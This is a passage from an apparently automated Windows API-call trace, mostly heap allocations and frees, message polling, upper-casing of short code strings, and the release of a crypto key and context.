out: lpMsg=0x8bf710) returned 0 [0198.406] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.407] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0198.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0198.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.408] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.408] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0198.408] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0198.409] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0198.409] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.409] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.409] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.409] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.409] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.409] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.409] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.410] CryptDestroyKey (hKey=0xaa5660) returned 1 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.410] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.411] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.411] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.411] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.411] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.411] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.411] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0198.411] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.411] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.412] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.412] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.412] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.412] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0198.412] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.412] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.412] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.413] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.413] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.413] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0198.413] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.413] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0198.413] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.413] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0198.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.413] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0198.413] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.413] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0198.413] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.413] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.413] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0198.413] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.414] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0198.414] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.414] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.414] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.414] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.414] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.414] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.414] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.414] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.414] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0198.414] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.414] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.414] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.414] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.415] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.415] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.415] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.415] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.415] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.415] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0198.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0198.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.417] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.417] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.417] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.417] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.417] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0198.418] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0198.418] FreeLibrary (hLibModule=0x74d40000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.418] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.418] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0198.418] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.419] HeapFree (in: hHeap=0x25c0000, 